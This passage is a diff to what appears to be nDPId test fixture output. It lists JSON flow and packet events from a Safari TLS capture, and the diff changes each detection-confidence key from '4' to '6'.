00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620898025216,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898025216,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EtfhAbvK+gqhAAAAALAC\/\/\/8IwAAAgQFtAEDAwUBAQgKMzDJ0wAAAAAEAgAA"} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898025216,"flow_last_seen":1620898025216,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898025216,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -25,32 +25,32 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfkAbuNFQafWZkBLYAQECwpbAAAAQEICjMwye06Vq75"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620898025247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025247,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+LVp22MQK\/Js6AS\/oitTAAAAgQFrAQCCAo6Vq72MzDJ0wEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620898025247,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025247,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtfiAbtAr8mz1adtjYAQECzKUwAAAQEICjMwye06Vq72"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025248,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025216,"flow_last_seen":1620898025249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025249,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620898025251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898025251,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71+Xyf4O0ZsTOPKAS\/ohPpwAAAgQFrAQCCAo6Vq75MzDJ1AEDAwc="} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620898025251,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898025251,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EtflAbtmxM488n+DtYAQECxsqwAAAQEICjMwyfE6Vq75"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 
-00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} -00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898025217,"flow_last_seen":1620898025252,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1620898025252,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"safari.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025277,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55267,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"safari.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55265,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"safari.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025279,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55268,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"safari.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025216,"flow_last_seen":1620898025281,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025281,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55266,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} +00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":77,"source":"safari.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898025217,"flow_last_seen":1620898025284,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":352,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898025284,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55269,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"ee4ced3f2d15de4b5cb6fb0a894fec9f","ja3s":"fd4bc6cea4877646ccd62f0792ec0b62","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620898027036,"flow_last_seen":1620898027036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620898027036,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5392,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1620898027036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620898027036,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6Etf1AbvGGXtuAAAAALAC\/\/+JoQAAAgQFtAEDAwUBAQgKMzDQVQAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5393,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620898027065,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG71\/XZbafoxhl7b6AS\/ogqVAAAAgQFrAQCCAo6VrYRMzDQVQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5394,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620898027065,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Etf1AbvGGXtv2W2n6YAQECxHWQAAAQEICjMw0HE6VrYR"} 
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5395,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620898027036,"flow_last_seen":1620898027065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1620898027065,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00926{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5397,"source":"safari.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620898027036,"flow_last_seen":1620898027099,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1675,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1620898027099,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":55285,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 